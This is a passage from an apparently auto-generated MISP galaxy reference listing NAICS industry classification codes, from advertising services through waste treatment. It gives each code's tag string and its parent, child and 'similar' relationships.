54181 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541810" with estimative-language:likelihood-probability="likely"

541810

Advertising Agencies

The tag is: misp-galaxy:naics="541810"

541810 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54181" with estimative-language:likelihood-probability="likely"

54182

Public Relations Agencies

The tag is: misp-galaxy:naics="54182"

54182 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541820" with estimative-language:likelihood-probability="likely"

541820

Public Relations Agencies

The tag is: misp-galaxy:naics="541820"

541820 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54182" with estimative-language:likelihood-probability="likely"

54183

Media Buying Agencies

The tag is: misp-galaxy:naics="54183"

54183 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541830" with estimative-language:likelihood-probability="likely"

541830

Media Buying Agencies

The tag is: misp-galaxy:naics="541830"

541830 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54183" with estimative-language:likelihood-probability="likely"

54184

Media Representatives

The tag is: misp-galaxy:naics="54184"

54184 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541840" with estimative-language:likelihood-probability="likely"

541840

Media Representatives

The tag is: misp-galaxy:naics="541840"

541840 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54184" with estimative-language:likelihood-probability="likely"

54185

Indoor and Outdoor Display Advertising

The tag is: misp-galaxy:naics="54185"

54185 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541850" with estimative-language:likelihood-probability="likely"

541850

Indoor and Outdoor Display Advertising

The tag is: misp-galaxy:naics="541850"

541850 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54185" with estimative-language:likelihood-probability="likely"

54186

Direct Mail Advertising

The tag is: misp-galaxy:naics="54186"

54186 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541860" with estimative-language:likelihood-probability="likely"

541860

Direct Mail Advertising

The tag is: misp-galaxy:naics="541860"

541860 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54186" with estimative-language:likelihood-probability="likely"

54187

Advertising Material Distribution Services

The tag is: misp-galaxy:naics="54187"

54187 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541870" with estimative-language:likelihood-probability="likely"

541870

Advertising Material Distribution Services

The tag is: misp-galaxy:naics="541870"

541870 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54187" with estimative-language:likelihood-probability="likely"

54189

Other Services Related to Advertising

The tag is: misp-galaxy:naics="54189"

54189 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541890" with estimative-language:likelihood-probability="likely"

541890

Other Services Related to Advertising

The tag is: misp-galaxy:naics="541890"

541890 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54189" with estimative-language:likelihood-probability="likely"

5419

Other Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="5419"

5419 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541990" with estimative-language:likelihood-probability="likely"

54191

Marketing Research and Public Opinion Polling

The tag is: misp-galaxy:naics="54191"

54191 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541910" with estimative-language:likelihood-probability="likely"

541910

Marketing Research and Public Opinion Polling

The tag is: misp-galaxy:naics="541910"

541910 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54191" with estimative-language:likelihood-probability="likely"

54192

Photographic Services

The tag is: misp-galaxy:naics="54192"

54192 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

541921

Photography Studios, Portrait

The tag is: misp-galaxy:naics="541921"

541921 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

541922

Commercial Photography

The tag is: misp-galaxy:naics="541922"

541922 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

54193

Translation and Interpretation Services

The tag is: misp-galaxy:naics="54193"

54193 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541930" with estimative-language:likelihood-probability="likely"

541930

Translation and Interpretation Services

The tag is: misp-galaxy:naics="541930"

541930 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54193" with estimative-language:likelihood-probability="likely"

54194

Veterinary Services

The tag is: misp-galaxy:naics="54194"

54194 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541940" with estimative-language:likelihood-probability="likely"

541940

Veterinary Services

The tag is: misp-galaxy:naics="541940"

541940 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54194" with estimative-language:likelihood-probability="likely"

54199

All Other Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="54199"

54199 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541990" with estimative-language:likelihood-probability="likely"

541990

All Other Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="541990"

541990 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54199" with estimative-language:likelihood-probability="likely"

55

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="55"

55 has relationships with:

  • parent-of: misp-galaxy:naics="551" with estimative-language:likelihood-probability="likely"

551

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="551"

551 has relationships with:

  • child-of: misp-galaxy:naics="55" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

5511

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="5511"

5511 has relationships with:

  • child-of: misp-galaxy:naics="551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="55111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="551111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="551112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="551114" with estimative-language:likelihood-probability="likely"

55111

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="55111"

55111 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

551111

Offices of Bank Holding Companies

The tag is: misp-galaxy:naics="551111"

551111 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

551112

Offices of Other Holding Companies

The tag is: misp-galaxy:naics="551112"

551112 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

551114

Corporate, Subsidiary, and Regional Managing Offices

The tag is: misp-galaxy:naics="551114"

551114 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

56

Administrative and Support and Waste Management and Remediation Services

The tag is: misp-galaxy:naics="56"

56 has relationships with:

  • parent-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

561

Administrative and Support Services

The tag is: misp-galaxy:naics="561"

561 has relationships with:

  • child-of: misp-galaxy:naics="56" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

5611

Office Administrative Services

The tag is: misp-galaxy:naics="5611"

5611 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561110" with estimative-language:likelihood-probability="likely"

56111

Office Administrative Services

The tag is: misp-galaxy:naics="56111"

56111 has relationships with:

  • child-of: misp-galaxy:naics="5611" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561110" with estimative-language:likelihood-probability="likely"

561110

Office Administrative Services

The tag is: misp-galaxy:naics="561110"

561110 has relationships with:

  • child-of: misp-galaxy:naics="5611" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56111" with estimative-language:likelihood-probability="likely"

5612

Facilities Support Services

The tag is: misp-galaxy:naics="5612"

5612 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561210" with estimative-language:likelihood-probability="likely"

56121

Facilities Support Services

The tag is: misp-galaxy:naics="56121"

56121 has relationships with:

  • child-of: misp-galaxy:naics="5612" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561210" with estimative-language:likelihood-probability="likely"

561210

Facilities Support Services

The tag is: misp-galaxy:naics="561210"

561210 has relationships with:

  • child-of: misp-galaxy:naics="5612" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56121" with estimative-language:likelihood-probability="likely"

5613

Employment Services

The tag is: misp-galaxy:naics="5613"

5613 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561330" with estimative-language:likelihood-probability="likely"

56131

Employment Placement Agencies and Executive Search Services

The tag is: misp-galaxy:naics="56131"

56131 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

561311

Employment Placement Agencies

The tag is: misp-galaxy:naics="561311"

561311 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

561312

Executive Search Services

The tag is: misp-galaxy:naics="561312"

561312 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

56132

Temporary Help Services

The tag is: misp-galaxy:naics="56132"

56132 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561320" with estimative-language:likelihood-probability="likely"

561320

Temporary Help Services

The tag is: misp-galaxy:naics="561320"

561320 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56132" with estimative-language:likelihood-probability="likely"

56133

Professional Employer Organizations

The tag is: misp-galaxy:naics="56133"

56133 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561330" with estimative-language:likelihood-probability="likely"

561330

Professional Employer Organizations

The tag is: misp-galaxy:naics="561330"

561330 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56133" with estimative-language:likelihood-probability="likely"

5614

Business Support Services

The tag is: misp-galaxy:naics="5614"

5614 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561439" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56144" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561440" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56145" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561450" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561499" with estimative-language:likelihood-probability="likely"

56141

Document Preparation Services

The tag is: misp-galaxy:naics="56141"

56141 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561410" with estimative-language:likelihood-probability="likely"

561410

Document Preparation Services

The tag is: misp-galaxy:naics="561410"

561410 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56141" with estimative-language:likelihood-probability="likely"

56142

Telephone Call Centers

The tag is: misp-galaxy:naics="56142"

56142 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561421

Telephone Answering Services

The tag is: misp-galaxy:naics="561421"

561421 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561422

Telemarketing Bureaus and Other Contact Centers

The tag is: misp-galaxy:naics="561422"

561422 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

56143

Business Service Centers

The tag is: misp-galaxy:naics="56143"

56143 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561431

Private Mail Centers

The tag is: misp-galaxy:naics="561431"

561431 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561439

Other Business Service Centers (including Copy Shops)

The tag is: misp-galaxy:naics="561439"

561439 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

56144

Collection Agencies

The tag is: misp-galaxy:naics="56144"

56144 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561440" with estimative-language:likelihood-probability="likely"

561440

Collection Agencies

The tag is: misp-galaxy:naics="561440"

561440 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56144" with estimative-language:likelihood-probability="likely"

56145

Credit Bureaus

The tag is: misp-galaxy:naics="56145"

56145 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561450" with estimative-language:likelihood-probability="likely"

561450

Credit Bureaus

The tag is: misp-galaxy:naics="561450"

561450 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56145" with estimative-language:likelihood-probability="likely"

56149

Other Business Support Services

The tag is: misp-galaxy:naics="56149"

56149 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561491

Repossession Services

The tag is: misp-galaxy:naics="561491"

561491 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561492

Court Reporting and Stenotype Services

The tag is: misp-galaxy:naics="561492"

561492 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561499

All Other Business Support Services

The tag is: misp-galaxy:naics="561499"

561499 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

5615

Travel Arrangement and Reservation Services

The tag is: misp-galaxy:naics="5615"

5615 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561520" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56159" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561599" with estimative-language:likelihood-probability="likely"

56151

Travel Agencies

The tag is: misp-galaxy:naics="56151"

56151 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561510" with estimative-language:likelihood-probability="likely"

561510

Travel Agencies

The tag is: misp-galaxy:naics="561510"

561510 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56151" with estimative-language:likelihood-probability="likely"

56152

Tour Operators

The tag is: misp-galaxy:naics="56152"

56152 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561520" with estimative-language:likelihood-probability="likely"

561520

Tour Operators

The tag is: misp-galaxy:naics="561520"

561520 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56152" with estimative-language:likelihood-probability="likely"

56159

Other Travel Arrangement and Reservation Services

The tag is: misp-galaxy:naics="56159"

56159 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

561591

Convention and Visitors Bureaus

The tag is: misp-galaxy:naics="561591"

561591 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

561599

All Other Travel Arrangement and Reservation Services

The tag is: misp-galaxy:naics="561599"

561599 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

5616

Investigation and Security Services

The tag is: misp-galaxy:naics="5616"

5616 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561622" with estimative-language:likelihood-probability="likely"

56161

Investigation, Guard, and Armored Car Services

The tag is: misp-galaxy:naics="56161"

56161 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561611

Investigation and Personal Background Check Services

The tag is: misp-galaxy:naics="561611"

561611 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561612

Security Guards and Patrol Services

The tag is: misp-galaxy:naics="561612"

561612 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561613

Armored Car Services

The tag is: misp-galaxy:naics="561613"

561613 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

56162

Security Systems Services

The tag is: misp-galaxy:naics="56162"

56162 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561621

Security Systems Services (except Locksmiths)

The tag is: misp-galaxy:naics="561621"

561621 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561622

Locksmiths

The tag is: misp-galaxy:naics="561622"

561622 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

5617

Services to Buildings and Dwellings

The tag is: misp-galaxy:naics="5617"

5617 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56172" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561720" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56173" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561730" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56174" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561740" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56179" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561790" with estimative-language:likelihood-probability="likely"

56171

Exterminating and Pest Control Services

The tag is: misp-galaxy:naics="56171"

56171 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561710" with estimative-language:likelihood-probability="likely"

561710

Exterminating and Pest Control Services

The tag is: misp-galaxy:naics="561710"

561710 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56171" with estimative-language:likelihood-probability="likely"

56172

Janitorial Services

The tag is: misp-galaxy:naics="56172"

56172 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561720" with estimative-language:likelihood-probability="likely"

561720

Janitorial Services

The tag is: misp-galaxy:naics="561720"

561720 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56172" with estimative-language:likelihood-probability="likely"

56173

Landscaping Services

The tag is: misp-galaxy:naics="56173"

56173 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561730" with estimative-language:likelihood-probability="likely"

561730

Landscaping Services

The tag is: misp-galaxy:naics="561730"

561730 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56173" with estimative-language:likelihood-probability="likely"

56174

Carpet and Upholstery Cleaning Services

The tag is: misp-galaxy:naics="56174"

56174 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561740" with estimative-language:likelihood-probability="likely"

561740

Carpet and Upholstery Cleaning Services

The tag is: misp-galaxy:naics="561740"

561740 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56174" with estimative-language:likelihood-probability="likely"

56179

Other Services to Buildings and Dwellings

The tag is: misp-galaxy:naics="56179"

56179 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561790" with estimative-language:likelihood-probability="likely"

561790

Other Services to Buildings and Dwellings

The tag is: misp-galaxy:naics="561790"

561790 has relationships with:

  • child-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56179" with estimative-language:likelihood-probability="likely"

5619

Other Support Services

The tag is: misp-galaxy:naics="5619"

5619 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561990" with estimative-language:likelihood-probability="likely"

56191

Packaging and Labeling Services

The tag is: misp-galaxy:naics="56191"

56191 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561910" with estimative-language:likelihood-probability="likely"

561910

Packaging and Labeling Services

The tag is: misp-galaxy:naics="561910"

561910 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56191" with estimative-language:likelihood-probability="likely"

56192

Convention and Trade Show Organizers

The tag is: misp-galaxy:naics="56192"

56192 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561920" with estimative-language:likelihood-probability="likely"

561920

Convention and Trade Show Organizers

The tag is: misp-galaxy:naics="561920"

561920 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56192" with estimative-language:likelihood-probability="likely"

56199

All Other Support Services

The tag is: misp-galaxy:naics="56199"

56199 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561990" with estimative-language:likelihood-probability="likely"

561990

All Other Support Services

The tag is: misp-galaxy:naics="561990"

561990 has relationships with:

  • child-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56199" with estimative-language:likelihood-probability="likely"

562

Waste Management and Remediation Services

The tag is: misp-galaxy:naics="562"

562 has relationships with:

  • child-of: misp-galaxy:naics="56" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

5621

Waste Collection

The tag is: misp-galaxy:naics="5621"

5621 has relationships with:

  • child-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562119" with estimative-language:likelihood-probability="likely"

56211

Waste Collection

The tag is: misp-galaxy:naics="56211"

56211 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

562111

Solid Waste Collection

The tag is: misp-galaxy:naics="562111"

562111 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

562112

Hazardous Waste Collection

The tag is: misp-galaxy:naics="562112"

562112 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

562119

Other Waste Collection

The tag is: misp-galaxy:naics="562119"

562119 has relationships with:

  • child-of: misp-galaxy:naics="5621" with estimative-language:likelihood-probability="likely"

5622

Waste Treatment and Disposal

The tag is: misp-galaxy:naics="5622"

5622 has relationships with:

  • child-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562213" with estimative-language:likelihood-probability="likely"

